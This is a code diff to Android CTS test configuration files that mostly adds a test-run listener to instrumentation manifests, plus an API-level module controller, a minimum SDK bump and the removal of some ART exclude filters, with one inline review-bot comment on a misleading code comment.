diff --git a/tests/tests/vcn/AndroidManifest.xml b/tests/tests/vcn/AndroidManifest.xml
index 87525a1..ac0625c 100644
--- a/tests/tests/vcn/AndroidManifest.xml
+++ b/tests/tests/vcn/AndroidManifest.xml
@@ -35,6 +35,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.net.vcn.cts"
android:label="CTS tests of android.net.vcn">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/view/AndroidManifest.xml b/tests/tests/view/AndroidManifest.xml
index f6e8481..47622f7 100644
--- a/tests/tests/view/AndroidManifest.xml
+++ b/tests/tests/view/AndroidManifest.xml
@@ -513,6 +513,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.cts"
android:label="CTS tests of android.view">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/view/sdk28/AndroidManifest.xml b/tests/tests/view/sdk28/AndroidManifest.xml
index 7e6b7a7..4ebefad0 100644
--- a/tests/tests/view/sdk28/AndroidManifest.xml
+++ b/tests/tests/view/sdk28/AndroidManifest.xml
@@ -36,6 +36,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.cts.sdk28"
android:label="CTS tests of android.view">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/virtualdevice/AndroidManifest.xml b/tests/tests/virtualdevice/AndroidManifest.xml
index 68fedd7..8d99779 100644
--- a/tests/tests/virtualdevice/AndroidManifest.xml
+++ b/tests/tests/virtualdevice/AndroidManifest.xml
@@ -45,6 +45,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.virtualdevice.cts"
android:label="CTS tests of android.companion.virtual">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/voiceRecognition/AndroidManifest.xml b/tests/tests/voiceRecognition/AndroidManifest.xml
index 796c507..b402802 100644
--- a/tests/tests/voiceRecognition/AndroidManifest.xml
+++ b/tests/tests/voiceRecognition/AndroidManifest.xml
@@ -43,5 +43,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.voicerecognition.cts"
android:label="CTS tests of android voicerecognition">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/voiceinteraction/AndroidManifest.xml b/tests/tests/voiceinteraction/AndroidManifest.xml
index 50d2b0f..090c661 100644
--- a/tests/tests/voiceinteraction/AndroidManifest.xml
+++ b/tests/tests/voiceinteraction/AndroidManifest.xml
@@ -245,5 +245,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.voiceinteraction.cts"
android:label="CTS tests of android.voiceinteraction">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/voiceinteraction/AndroidTest.xml b/tests/tests/voiceinteraction/AndroidTest.xml
index 6191ac9..a69379f 100644
--- a/tests/tests/voiceinteraction/AndroidTest.xml
+++ b/tests/tests/voiceinteraction/AndroidTest.xml
@@ -49,4 +49,11 @@
<option name="package" value="android.voiceinteraction.cts" />
<option name="runtime-hint" value="11m" />
</test>
+
+ <!-- This test is included as part of GTS 11 but is built against U SDK.
+ Skip on non-U devices. -->
+ <object type="module_controller"
+ class="com.android.tradefed.testtype.suite.module.MinApiLevelModuleController">
+ <option name="min-api-level" value="34" />
+ </object>
</configuration>
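Review bot: The added comment says "Skip on non-U devices", but `min-api-level` is a lower bound, so the module is skipped only below API 34 and still runs on later releases. The comment `<!-- Built against the U SDK (API 34); skip on devices below API 34. -->` would match the behaviour. Which system property the controller compares against is not set in this hunk. If the intent is the running OS version rather than the launch API level, an explicit `api-level-prop` option would remove the ambiguity for devices upgraded to U.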
diff --git a/tests/tests/voicesettings/AndroidManifest.xml b/tests/tests/voicesettings/AndroidManifest.xml
index c1ebf25..ba50604 100644
--- a/tests/tests/voicesettings/AndroidManifest.xml
+++ b/tests/tests/voicesettings/AndroidManifest.xml
@@ -40,5 +40,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.voicesettings.cts"
android:label="CTS tests of android.voicesettings">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/webkit/AndroidManifest.xml b/tests/tests/webkit/AndroidManifest.xml
index d97716c..96e9e6c 100644
--- a/tests/tests/webkit/AndroidManifest.xml
+++ b/tests/tests/webkit/AndroidManifest.xml
@@ -105,6 +105,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.webkit.cts"
android:label="CTS tests of android.webkit">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/widget/AndroidManifest.xml b/tests/tests/widget/AndroidManifest.xml
index f03dd26..a14568f 100644
--- a/tests/tests/widget/AndroidManifest.xml
+++ b/tests/tests/widget/AndroidManifest.xml
@@ -737,6 +737,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.cts"
android:label="CTS tests of android.widget">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/widget29/AndroidManifest.xml b/tests/tests/widget29/AndroidManifest.xml
index 89d63b5..d338368 100644
--- a/tests/tests/widget29/AndroidManifest.xml
+++ b/tests/tests/widget29/AndroidManifest.xml
@@ -39,6 +39,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.cts29"
android:label="(SDK 29) CTS tests of android.widget">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/wifi/AndroidManifest.xml b/tests/tests/wifi/AndroidManifest.xml
index c618fc5..b3fbee0 100644
--- a/tests/tests/wifi/AndroidManifest.xml
+++ b/tests/tests/wifi/AndroidManifest.xml
@@ -57,6 +57,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.net.wifi.cts"
android:label="CTS tests of android.net.wifi">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/video/AndroidManifest.xml b/tests/video/AndroidManifest.xml
index f0ffb88..8cdc050 100644
--- a/tests/video/AndroidManifest.xml
+++ b/tests/video/AndroidManifest.xml
@@ -30,6 +30,9 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.video.cts"
android:label="CTS tests for Video" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
</manifest>
diff --git a/tests/videocodec/AndroidManifest.xml b/tests/videocodec/AndroidManifest.xml
index 3fa4c61..14e2f31 100644
--- a/tests/videocodec/AndroidManifest.xml
+++ b/tests/videocodec/AndroidManifest.xml
@@ -31,5 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.videocodec.cts"
android:label="CTS VideoCodec tests of android.videocodec" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/vr/Android.bp b/tests/vr/Android.bp
index c396922..6b145c9 100644
--- a/tests/vr/Android.bp
+++ b/tests/vr/Android.bp
@@ -37,7 +37,7 @@
":CtsVerifierMockVrListenerServiceFiles",
],
sdk_version: "test_current",
- min_sdk_version: "14",
+ min_sdk_version: "19",
// Tag this module as a cts test artifact
test_suites: [
"cts",
diff --git a/tests/vr/AndroidManifest.xml b/tests/vr/AndroidManifest.xml
index 5925618..0196566 100644
--- a/tests/vr/AndroidManifest.xml
+++ b/tests/vr/AndroidManifest.xml
@@ -25,6 +25,8 @@
<uses-feature android:glEsVersion="0x00020000"/>
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.vr.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<application android:icon="@drawable/ic_launcher"
diff --git a/tools/cts-tradefed/res/config/cts-exclude.xml b/tools/cts-tradefed/res/config/cts-exclude.xml
index 2b9e674..b754596 100644
--- a/tools/cts-tradefed/res/config/cts-exclude.xml
+++ b/tools/cts-tradefed/res/config/cts-exclude.xml
@@ -33,16 +33,4 @@
<!-- Exclude @SecurityTest tests from CTS. These are tested in STS. b/180417031-->
<option name="compatibility:test-arg" value="com.android.tradefed.testtype.AndroidJUnitTest:exclude-annotation:android.platform.test.annotations.AsbSecurityTest" />
<option name="compatibility:test-arg" value="com.android.compatibility.common.tradefed.testtype.JarHostTest:exclude-annotation:android.platform.test.annotations.AsbSecurityTest" />
-
- <!-- Exclude JvmtiHostTest911 as it's tested in MTS and depends on implementation details of the ART module. http://b/286797612 -->
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest911HostTestCases" />
- <!-- Exclude few tests as it depends on implementation details of the ART module. b/287732826 -->
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest913HostTestCases" />
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest912HostTestCases" />
- <option name="compatibility:exclude-filter" value="CtsJvmtiRunTest988HostTestCases" />
-
- <!-- Exclude art_standalone_dex2oat_cts_tests which cannot link with recent
- ART module due to internal library symbol changes. b/288212464#comment5 -->
- <option name="compatibility:exclude-filter" value="art_standalone_dex2oat_cts_tests" />
-
</configuration>